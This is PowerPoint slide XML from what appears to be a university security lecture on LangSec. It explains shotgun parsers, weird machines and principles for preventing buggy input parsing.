            <a:pPr marL="362885" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="362885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36346-4EFE-EED0-764B-60C386E70A35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54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05053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48D1-E883-D20B-0282-18AD8D79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Can we use input validation?</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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6538-AF43-58EB-18F4-A18479DD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Suppose we have a buggy PDF viewer with memory corruption that allows RCE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>Can we use input validation as protection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Yes &amp; no: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>we could validate a PDF file before feeding it to our PDF viewer, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>but... for that we need a correct &amp; secure PDF parser, so we are back to the original problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Still, for legacy applications it may be an improvement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A756-E59A-C490-49A7-3869244C39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30450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52CB36D-5D13-AEC5-EBA3-6B9A6A6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en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LangSec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Language-Theoretic Security)     </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="2400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84E19F2-39B5-2249-EEBC-19FF75F5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Interesting look at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0"/>
              <a:t>of large class of input handling bugs, namely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buggy parsing  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" err="1"/>
              <a:t>Useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" err="1"/>
              <a:t>suggestions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0"/>
              <a:t>s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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>don’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US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sz="1633" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="1633" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1633" dirty="0"/>
              <a:t>The ‘Lang’ in ‘LangSec’ refers to  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1633" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   languages,                                                        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                   not  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1633" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>programming  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="1633" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> languages.                                      </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Tijdelijke aanduiding voor dianummer 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CD37D66-571A-A82D-1A2E-83B0D9A3A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341B286-EA36-4505-A974-4CEFD0A4E844}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL">
                <a:ea typeface="DejaVu Sans"/>
                <a:cs typeface="DejaVu Sans"/>
              </a:rPr>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL">
              <a:ea typeface="DejaVu Sans"/>
              <a:cs typeface="DejaVu Sans"/>
            </a:endParaRP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418FB35E-8F0E-D5DD-629E-8DE90BC3B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437280" cy="20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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D20A904-7ACF-EBA1-F714-19603928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418" y="3454496"/>
            <a:ext cx="3483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‘The science of insecurity’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EE963-663D-9C19-B864-DCB45ACE0A28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5419057" y="2562603"/>
            <a:ext cx="34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Sergey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Bratus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&amp;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Meredith Patterson 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presenting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LangSec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at CCC 2012 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4A0-75B2-981E-4B14-8445E04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Root causes / anti-patterns</a:t>
            </a:r>
            <a:endParaRPr lang="en-N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DF4-CA53-5465-78FD-75E3C5B6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Complex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> input language or format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Sloppy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definitions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> of this input language or format</a:t>
            </a:r>
          </a:p>
          <a:p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Hand-written parser code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mixing input recognition &amp; processing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shotgun parser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL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E96FD-4C0D-BF9B-F004-A638179DF66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57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606641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1BA82990-C827-4E37-7F17-FB313709F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27126" b="40657"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6463739" y="2403021"/>
            <a:ext cx="2652540" cy="9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B4C2F661-92A3-7827-7398-FA22915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Anti-pattern: shotgun parser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B10DC61A-165D-8095-58AC-5C0E45FE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47" y="3545422"/>
            <a:ext cx="7632848" cy="28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Code incrementally parses &amp; interprets input, in a piecemeal fashion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chopping it up for further parsing elsewhere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Fragments passed around as unparsed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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byte arrays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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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strings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Input fragments of input penetrate deeply, and any code that touches these bits may contain exploitable input bugs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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361B79-B72E-B17D-1C27-43DFCA14E7D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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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53C068A-F203-36FB-657C-5F8FC531B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28" y="883706"/>
            <a:ext cx="1448927" cy="1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EDB5B9-0316-415D-FFDD-757A11E801A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="919598" y="1140740"/>
            <a:ext cx="5120130" cy="2220848"/>
            <a:chOff x="1310044" y="1368098"/>
            <a:chExt cx="5120130" cy="2220848"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="44036" name="Groep 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD8B0E7C-110F-F0CB-56BE-F74E367E6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0044" y="1368098"/>
              <a:ext cx="5120130" cy="2220848"/>
              <a:chOff x="1543166" y="1142409"/>
              <a:chExt cx="5212111" cy="2261327"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44039" name="Afgeronde rechthoek 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBEF86AD-2365-E41E-A55A-74738B4A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198" y="1142409"/>
                <a:ext cx="2991079" cy="226132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DejaVu Sans"/>
                    <a:cs typeface="DejaVu Sans"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a: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GB" alt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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="44040" name="Picture 2" descr="C:\Users\erikpoll\Desktop\.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CC02B6-32C6-9311-EDD6-0F70D39AF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166" y="1673754"/>
                <a:ext cx="763029" cy="76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ight Arrow 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26639087-D918-AC6B-8E91-E9196B1F9DED}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2463494" y="1908061"/>
                <a:ext cx="1077867" cy="28902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177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44037" name="Rechthoek 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15684E91-50A0-6DA9-3BDC-46806A40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762" y="1761481"/>
              <a:ext cx="321520" cy="9144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4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DejaVu Sans"/>
                  <a:cs typeface="DejaVu Sans"/>
                </a:rPr>
                <a:t>parser</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US" sz="16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8FD4DE-612D-A3E1-1E6B-E5014D3B962C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2206950" y="1761481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NL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5" name="Right Arrow 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4E66668-5E23-A70A-7739-30ABD9DA50EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3859417" y="1919629"/>
              <a:ext cx="426167" cy="1542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1F979F1C-0C30-FB05-CF61-0453CAC371B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860044" y="2453347"/>
              <a:ext cx="426167" cy="1542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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CFEEFBF-20D8-37AC-35E7-CBA006731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587" y="1757266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9" name="Rechthoek 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64915A89-2F9F-7D72-3F2B-B847D6D9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040" y="2424495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1" name="Rechthoek 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9142AACA-CF4B-94BD-E0DC-FD385CB5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720" y="2241437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2" name="Rechthoek 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571916EC-02D9-7702-2D5B-930737DE9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640" y="2806025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3" name="Right Arrow 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5758BA-D181-9484-B516-F6CD3DD36B61}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4545235" y="2478522"/>
              <a:ext cx="749869" cy="10663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ight Arrow 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5358A175-D097-2D7E-40C5-EA046201AD98}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4568298" y="2809803"/>
              <a:ext cx="673363" cy="1500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echthoek 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D745C6BB-7858-BC70-1CF7-6B502F77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238" y="2076072"/>
              <a:ext cx="161279" cy="40729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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Right Arrow 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F52331-9582-C6BC-A291-45825B1ED796}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5552816" y="2230356"/>
              <a:ext cx="466157" cy="1441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9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4A0-75B2-981E-4B14-8445E04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LangSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-NL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DF4-CA53-5465-78FD-75E3C5B6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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shotgun parser: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shattershot approach to parsing data in bits and pieces, mixing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>recognition (i.e. the actual parsing) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processing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</a:p>
          <a:p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Weird machine: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a buggy parser provides a strange execution platform that can be ‘programmed’ with malformed input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This weird machine may even be Turing-complete (recall ROP programming with gadgets)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cool example: executing code on a x86 processor just using page faults, without ever executing CPU instructions                                      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Bangert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Bratus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Shapiro, and Smith, The Page-Fault Weird Machine: Lessons in Instruction-less Computation, USENIX WOOT 2014]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="nl-NL" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="414726" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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E96FD-4C0D-BF9B-F004-A638179DF66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59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805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observations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Most (all?) attacks involve  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>which ends up in a place where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> it causes software to ‘go off the rails’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Input may be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>forwarded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> between systems to reach place where it does damage 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GB" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are there structural approach to combat these 100s of variants of input handling problems?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicParenR"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18824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9CD3CC6-934D-8F54-3839-D556A7F8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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LangSec principles to prevent buggy parsing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18C3-B634-6529-A122-F7907E7E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nl-NL" dirty="0"/>
              <a:t>No more hand-coded shotgun parsers, but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precisely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  input languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457153" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> ideally with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regular expression </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>context-free grammar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(eg EBNF)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generated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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 parser code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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>complete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457153" indent="-457153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NL" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keep the input language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simple &amp; clear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nl-NL" sz="1633" dirty="0"/>
              <a:t>   So </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1633" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1633" dirty="0"/>
              <a:t> bugs are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1633" dirty="0" err="1"/>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1633" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1633" dirty="0" err="1"/>
              <a:t>likely</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1633" dirty="0"/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nl-NL" sz="1633" dirty="0"/>
              <a:t>   So that you give minimal processing power to attackers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989D21A-141E-C9C4-0488-96DE44738231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60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0289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4C2F661-92A3-7827-7398-FA22915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Preventing buggy parsing - the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>LangSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44039" name="Afgeronde rechthoek 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBEF86AD-2365-E41E-A55A-74738B4A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038" y="1306464"/>
            <a:ext cx="4103297" cy="22665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814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t>application</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2177" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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pic>
        <p:nvPicPr>
          <p:cNvPr id="44040" name="Picture 2" descr="C:\Users\erikpoll\Desktop\.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CC02B6-32C6-9311-EDD6-0F70D39A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8896"/>
            <a:ext cx="883403" cy="8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26639087-D918-AC6B-8E91-E9196B1F9DED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2192720" y="2122946"/>
            <a:ext cx="977760" cy="262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44037" name="Rechthoek 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15684E91-50A0-6DA9-3BDC-46806A40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61" y="1761481"/>
            <a:ext cx="489600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t>parser</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1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B10DC61A-165D-8095-58AC-5C0E45FE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176042"/>
            <a:ext cx="7632848" cy="254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2177" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
